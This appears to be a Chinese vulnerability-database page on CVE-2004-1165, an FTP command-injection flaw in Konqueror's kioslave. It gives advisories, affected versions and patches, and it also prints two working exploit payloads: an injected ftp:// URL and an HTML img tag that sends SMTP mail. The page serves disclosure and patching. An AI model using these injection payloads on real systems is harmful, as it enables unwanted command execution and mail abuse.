CVE-2004-1165
CVSS7.5
发布时间 :2005-01-10 00:00:00
修订时间 :2017-10-10 21:29:42
NMCOEPS    

[原文]Konqueror 3.3.1 allows remote attackers to execute arbitrary FTP commands via an ftp:// URL that contains a URL-encoded newline ("%0a") before the FTP command, which causes the commands to be inserted into the resulting FTP session, as demonstrated using a PORT command.


[CNNVD]Konqueror FTP 命令执行漏洞(CNNVD-200501-041)

        Konqueror是一款开源的Web浏览器。
        Konqueror 3.3.1版本在ftp处理中存在缺陷,允许远程攻击者执行任意FTP命令。
        远程攻击者通过在FTP URL中,使用一个URL编码的新行("%0a")标记,其后插入的FTP命令将在FTP会话中被执行。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:kde:kdelibs:3.1
cpe:/a:kde:kdelibs:3.1.1
cpe:/a:kde:kdelibs:3.1.2
cpe:/a:kde:kdelibs:3.1.3
cpe:/a:kde:kdelibs:3.1.4
cpe:/a:kde:kdelibs:3.1.5
cpe:/a:kde:kdelibs:3.2
cpe:/a:kde:kdelibs:3.2.1
cpe:/a:kde:kdelibs:3.2.2
cpe:/a:kde:konqueror:3.3.1

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:9645Konqueror 3.3.1 allows remote attackers to execute arbitrary FTP commands via an ftp:// URL that contains a URL-encoded newline ("%0a") befo...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1165
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1165
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200501-041
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=110245752232681&w=2
(UNKNOWN)  BUGTRAQ  20041205 7a69Adv#16 - Konqueror FTP command injection
http://www.debian.org/security/2005/dsa-631
(UNKNOWN)  DEBIAN  DSA-631
http://www.gentoo.org/security/en/glsa/glsa-200501-18.xml
(UNKNOWN)  GENTOO  GLSA-200501-18
http://www.mandriva.com/security/advisories?name=MDKSA-2005:045
(UNKNOWN)  MANDRAKE  MDKSA-2005:045
http://www.redhat.com/support/errata/RHSA-2005-009.html
(UNKNOWN)  REDHAT  RHSA-2005:009
http://www.redhat.com/support/errata/RHSA-2005-065.html
(UNKNOWN)  REDHAT  RHSA-2005:065
https://exchange.xforce.ibmcloud.com/vulnerabilities/18384
(UNKNOWN)  XF  web-browser-ftp-command-execution(18384)

- 漏洞信息

Konqueror FTP 命令执行漏洞
高危 输入验证
2005-01-10 00:00:00 2005-10-20 00:00:00
远程  
        Konqueror是一款开源的Web浏览器。
        Konqueror 3.3.1版本在ftp处理中存在缺陷,允许远程攻击者执行任意FTP命令。
        远程攻击者通过在FTP URL中,使用一个URL编码的新行("%0a")标记,其后插入的FTP命令将在FTP会话中被执行。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://www.kde.org/

- 漏洞信息 (24801)

KDE FTP KIOSlave URI Arbitrary FTP Server Command Execution Vulnerability (EDBID:24801)
linux remote
2004-12-06 Verified
0 Albert Puigsech Galicia
N/A [点击下载]
source: http://www.securityfocus.com/bid/11827/info

KDE FTP kioslave-based applications such as Konqueror are reported prone to an arbitrary FTP server command execution vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input prior to utilizing it to execute FTP commands on remote servers.

This vulnerability allows attackers to embed arbitrary FTP server commands in malicious URIs. Upon following this malicious URI, the victim users Web browser will reportedly connect to the attacker-specified FTP server, and the malicious commands will be sent to the server. This may allow malicious files to be downloaded to the victims computer without their knowledge. Other attacks are also likely possible.

Note: It has been reported that this issue can be leveraged to send email to arbitrary addresses without user interaction.

ftp://ftp.example.com/%0aPORT%20a,b,c,d,e,f%0aRETR%20/file

The 'a,b,c,d,e,f' would represent the IP address and port specifications, as per the FTP RFCs.

This issue has also been reported to allow for the sending of email without user interaction. Embedding the following image into an HTML page reportedly sends an email:

<img src="ftp://foo%0d%0aHELO%20mail%0d%0aMAIL%20FROM%3a&lt;&gt;%0d%0aRCPT%20TO%3a&lt;username%40example.com&gt;%0d%0aDATA%0d%0aSubject%3a%20hacked%0d%0aTo%3a%20username%40example.com%0d%0a%0d%0ahacked%0d%0a.%0d%0a:username@mx.example.net:25/" />		

- 漏洞信息 (F35605)

KDE Security Advisory 2005-01-01.1 (PacketStormID:F35605)
2005-01-05 00:00:00
KDE Desktop  kde.org
advisory,remote,arbitrary,protocol
CVE-2004-1165
[点击下载]

KDE Security Advisory: KDE applications which use the ftp kioslave, e.g. Konqueror, allow remote attackers to execute arbitrary FTP commands via an ftp:// URL that contains an URL-encoded newline ( %0a ) before the ftp command, which causes the commands to be inserted into the resulting FTP session. Due to similarities between the ftp and the SMTP protocol, this vulnerability allows to misuse the ftp slave to connect to a SMTP server and issue arbitrary commands, like sending an email. Systems affected: All KDE releases up to including KDE 3.3.2.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


KDE Security Advisory: ftp kioslave command injection
Original Release Date: 2005-01-01
URL: http://www.kde.org/info/security/advisory-20050101-1.txt

0. References

        http://www.securityfocus.com/bid/11827
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1165


1. Systems affected:

        All KDE releases up to including KDE 3.3.2.


2. Overview:

        KDE applications which use the ftp kioslave, e.g. Konqueror, allow
        remote attackers to execute arbitrary FTP commands via an ftp://
        URL that contains an URL-encoded newline ( %0a ) before the ftp
        command, which causes the commands to be inserted into the resulting
        FTP session. 

        Due to similiarities between the ftp and the SMTP protocol, this
        vulnerability allows to misuse the ftp slave to connect to a
        SMTP server and issue arbitrary commands, like sending an email.


3. Impact:

        The FTP kioslave can be misused to execute any ftp command on the
        server or be a vector for sending out unsolicited email.


4. Solution:

        Source code patches have been made available which fix these
        vulnerabilities. Contact your OS vendor / binary package provider
        for information about how to obtain updated binary packages.


5. Patch:

        Patch for KDE 3.2.3 is available from 
        ftp://ftp.kde.org/pub/kde/security_patches :

        a639b7b592f005e911c454a0a8c9c542  post-3.2.3-kdelibs-kioslave.patch

        Patch for KDE 3.3.2 is available from 
        ftp://ftp.kde.org/pub/kde/security_patches :

        fe67157b26a8cdf5bcfa1898cdf3b154  post-3.3.2-kdelibs-kioslave.patch


6. Time line and credits:

        26/12/2004 Public bug report filed against kio_ftp by Thiago Macieira
                   about being able to send email via kio_ftp CR/LF injection.
        26/12/2004 Patches developed by Thiago Macieira developed and applied
                   to CVS.
        01/01/2005 Advisory released.



-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFB1ZPcvsXr+iuy1UoRAiSWAJ49IvuT9yPcKVFqjN2fFthdHOwOGACfX+qH
0iekelUzvQw3OPsLuOPFixg=
=57Wh
-----END PGP SIGNATURE-----
    

- 漏洞信息

12853
Multiple Browser FTP Client Arbitrary Mail Relay
Remote / Network Access
Loss of Integrity

- 漏洞描述

- 时间线

2004-12-23 Unknow
2004-12-23 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

KDE FTP KIOSlave URI Arbitrary FTP Server Command Execution Vulnerability
Input Validation Error 11827
Yes No
2004-12-06 12:00:00 2009-07-12 08:07:00
Albert Puigsech Galicia <ripe@7a69ezine.org> disclosed this vulnerability.

- 受影响的程序版本

SGI ProPack 3.0
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux 8.1
S.u.S.E. Linux 8.0 i386
S.u.S.E. Linux 8.0
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux WS 2.1 IA64
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux ES 2.1 IA64
RedHat Enterprise Linux ES 2.1
RedHat Desktop 3.0
RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
RedHat Advanced Workstation for the Itanium Processor 2.1
Red Hat Fedora Core3
Red Hat Fedora Core2
Red Hat Enterprise Linux AS 3
Red Hat Enterprise Linux AS 2.1 IA64
Red Hat Enterprise Linux AS 2.1
KDE Konqueror 3.3.2
KDE Konqueror 3.3.1
KDE Konqueror 3.3
KDE Konqueror 3.2.3
KDE Konqueror 3.2.2 -6
KDE Konqueror 3.2.1
KDE Konqueror 3.1.5
KDE Konqueror 3.1.4
KDE Konqueror 3.1.3
KDE Konqueror 3.1.2
+ KDE KDE 3.1.2
KDE Konqueror 3.1.1
+ KDE KDE 3.1.1
KDE Konqueror 3.1
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Mandriva Linux Mandrake 9.1
KDE Konqueror 3.0.5 b
KDE Konqueror 3.0.5
+ MandrakeSoft Corporate Server 2.1
+ Mandriva Linux Mandrake 9.0
+ Mandriva Linux Mandrake 9.0
KDE Konqueror 3.0.3
+ KDE KDE 3.0.3
KDE Konqueror 3.0.2
+ KDE KDE 3.0.2
KDE Konqueror 3.0.1
+ KDE KDE 3.0.1
KDE Konqueror 3.0
+ KDE KDE 3.0
KDE kdelibs 3.2.2
+ KDE KDE 3.2.2
+ Red Hat Fedora Core2
KDE kdelibs 3.2.1
KDE kdelibs 3.2
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ MandrakeSoft Corporate Server 3.0 x86_64
+ MandrakeSoft Corporate Server 3.0
+ Mandriva Linux Mandrake 10.1 x86_64
+ Mandriva Linux Mandrake 10.1
+ Mandriva Linux Mandrake 10.0 AMD64
+ Mandriva Linux Mandrake 10.0
KDE kdelibs 3.1.5
+ KDE KDE 3.1.5
KDE kdelibs 3.1.4
+ KDE KDE 3.1.4
KDE kdelibs 3.1.3
+ KDE KDE 3.1.3
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
KDE kdelibs 3.1.2
KDE kdelibs 3.1.1
+ KDE KDE 3.1.1
KDE kdelibs 3.1
+ KDE KDE 3.1
KDE KDE 3.3.2
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 amd64
+ Debian Linux 3.1 amd64
+ Debian Linux 3.1 amd64
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
+ Debian Linux 3.1
+ Debian Linux 3.1
KDE KDE 3.3.1
+ Red Hat Fedora Core3
KDE KDE 3.3
KDE KDE 3.2.3
KDE KDE 3.2.2
+ KDE KDE 3.2.2
+ Red Hat Fedora Core2
KDE KDE 3.2.1
KDE KDE 3.2
KDE KDE 3.1.5
KDE KDE 3.1.4
KDE KDE 3.1.3
+ Red Hat Enterprise Linux AS 3
+ Red Hat Enterprise Linux AS 3
+ RedHat Desktop 3.0
+ RedHat Desktop 3.0
+ RedHat Enterprise Linux ES 3
+ RedHat Enterprise Linux ES 3
+ RedHat Enterprise Linux WS 3
KDE KDE 3.1.2
+ Conectiva Linux 9.0
+ Conectiva Linux 9.0
+ KDE KDE 3.1.2
KDE KDE 3.1.1 a
KDE KDE 3.1.1
+ Conectiva Linux 9.0
+ S.u.S.E. Linux Personal 8.2
+ S.u.S.E. Linux Personal 8.2
KDE KDE 3.1
+ RedHat Linux 9.0 i386
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux 8.1
KDE KDE 3.0.5 b
KDE KDE 3.0.5 a
+ RedHat Linux 8.0 i386
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3 i386
KDE KDE 3.0.5
+ Conectiva Linux 8.0
KDE KDE 3.0.4
+ Conectiva Linux 8.0
+ Gentoo Linux 1.4 _rc1
+ Gentoo Linux 1.2
+ Gentoo Linux 1.2
KDE KDE 3.0.3 a
KDE KDE 3.0.3
+ Conectiva Linux 8.0
+ Conectiva Linux 8.0
+ Conectiva Linux Enterprise Edition 1.0
+ FreeBSD FreeBSD 4.7 -STABLE
+ FreeBSD FreeBSD 4.7 -STABLE
+ Mandriva Linux Mandrake 9.0
+ Mandriva Linux Mandrake 9.0
KDE KDE 3.0.2
+ Mandriva Linux Mandrake 8.2
KDE KDE 3.0.1
KDE KDE 3.0
+ Conectiva Linux 8.0

- 漏洞讨论

KDE FTP kioslave-based applications such as Konqueror are reported prone to an arbitrary FTP server command execution vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input prior to utilizing it to execute FTP commands on remote servers.

This vulnerability allows attackers to embed arbitrary FTP server commands in malicious URIs. Upon following this malicious URI, the victim users Web browser will reportedly connect to the attacker-specified FTP server, and the malicious commands will be sent to the server. This may allow malicious files to be downloaded to the victims computer without their knowledge. Other attacks are also likely possible.

Note: It has been reported that this issue can be leveraged to send email to arbitrary addresses without user interaction.

- 漏洞利用

An example URI sufficient to exploit this vulnerability is provided:

ftp://ftp.example.com/%0aPORT%20a,b,c,d,e,f%0aRETR%20/file

The 'a,b,c,d,e,f' would represent the IP address and port specifications, as per the FTP RFCs.

This issue has also been reported to allow for the sending of email without user interaction. Embedding the following image into an HTML page reportedly sends an email:

&lt;img src="ftp://foo%0d%0aHELO%20mail%0d%0aMAIL%20FROM%3a&amp;lt;&amp;gt;%0d%0aRCPT%20TO%3a&amp;lt;username%40example.com&amp;gt;%0d%0aDATA%0d%0aSubject%3a%20hacked%0d%0aTo%3a%20username%40example.com%0d%0a%0d%0ahacked%0d%0a.%0d%0a:username@mx.example.net:25/" /&gt;

- 解决方案

Mandrake Linux has released an advisory (MDKSA-2004:160) dealing with this issue. Mandrake has also released an additional advisory to address this issue (MDKSA-2005:045). Please see the referenced advisories for more information.

Debian has released advisory DSA 631-1 to provide updates for kdelibs. Please see the attached advisory for details on obtaining and applying fixes.

Gentoo has released an advisory to provide updates for this issue. Updates may be applied by running the following commands as the superuser:
emerge --sync
emerge --ask --oneshot --verbose kde-base/kdelibs

KDE has released patches for KDE 3.2.3 and 3.3.2.

Fedora has released advisories FEDORA-2005-063 and FEDORA-2005-064 for Fedora Core 2 and 3. These advisories contain updated kdelibs packages. Please see the referenced advisories for more information.

SuSE Linux has released a security summary report (SUSE-SR:2005:003) that contains fixes to address this and other vulnerabilities. Customers are advised to peruse the referenced advisory for further information regarding obtaining and applying appropriate updates.

Red Hat has released advisory RHSA-2005:009-19 to address issues in KDE. Please see the advisory in Web references for more information.

SGI has released advisory 20050207-01-U including Patch 10144 that contains updated SGI ProPack 3 Service Pack 4 RPMs for the SGI Altix products. This patch addresses various issues. Please see the referenced advisory for more information.


SGI ProPack 3.0

KDE KDE 3.1.1

KDE KDE 3.1.4

KDE KDE 3.2

KDE KDE 3.2.1

KDE KDE 3.2.2

KDE Konqueror 3.2.3

KDE KDE 3.2.3

KDE KDE 3.3

KDE KDE 3.3.2

KDE Konqueror 3.3.2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站